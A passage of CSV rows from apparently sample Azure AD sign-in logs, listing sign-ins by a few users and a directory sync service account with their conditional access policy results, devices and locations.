'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",1e022ef8-42bd-4629-aeea-c317fedc4400,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,1e022ef8-42bd-4629-aeea-c317fedc4400,SigninLogs,Sucess,32.32146072,34.85319901
+722,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,02:02.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,97dae959-f3b0-40e2-b758-8548030b3c7d,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 14:02,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",3108dc47-edad-48bc-88bb-75ce35c61500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,3108dc47-edad-48bc-88bb-75ce35c61500,SigninLogs,Sucess,33.7984581,-84.38828278
+723,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:38.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,73c4ffc6-75d5-4bd5-ae49-d67a029252c7,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",2903ae2d-5f7e-48a4-9564-1a668fcc2100,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,2903ae2d-5f7e-48a4-9564-1a668fcc2100,SigninLogs,Sucess,36.6404686,-78.26995087
+724,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:33.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,09a99efa-67e1-4e70-90b8-387aff870e5e,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 20:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6f905d6a-b8b5-48fe-8361-59d77e052200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6f905d6a-b8b5-48fe-8361-59d77e052200,SigninLogs,Sucess,36.6404686,-78.26995087
+725,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:42.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0edb6f25-7648-4a71-aa97-a71af0fce72a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",3108dc47-edad-48bc-88bb-75ce277c2600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3108dc47-edad-48bc-88bb-75ce277c2600,SigninLogs,Sucess,36.6404686,-78.26995087
+726,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:43.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,af463770-06a2-4368-9b18-54cc3093d2ce,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",6052c246-a70b-451d-9677-f5a70ed02800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6052c246-a70b-451d-9677-f5a70ed02800,SigninLogs,Sucess,36.6404686,-78.26995087
+727,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:38.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c30e4b36-e30a-4f41-9783-2d2af298fdd6,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",028ee73f-e71d-464b-b4fd-9db252072600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,028ee73f-e71d-464b-b4fd-9db252072600,SigninLogs,Sucess,36.6404686,-78.26995087
+728,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,21:37.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9d4b73b5-c71e-48b1-8921-99b6e060b73a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notEnabled', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['AppEnforcedRestrictions'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'JulianI Exchange native controls', 'result': 'notApplied', 'id': 'e183bd29-a3a3-4f91-a5a3-b83b21a544df'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'reportOnlyNotApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}]",notApplied,09/04/2020 23:21,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",231a1112-0bf5-4aba-9d7a-1056a1d22700,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active 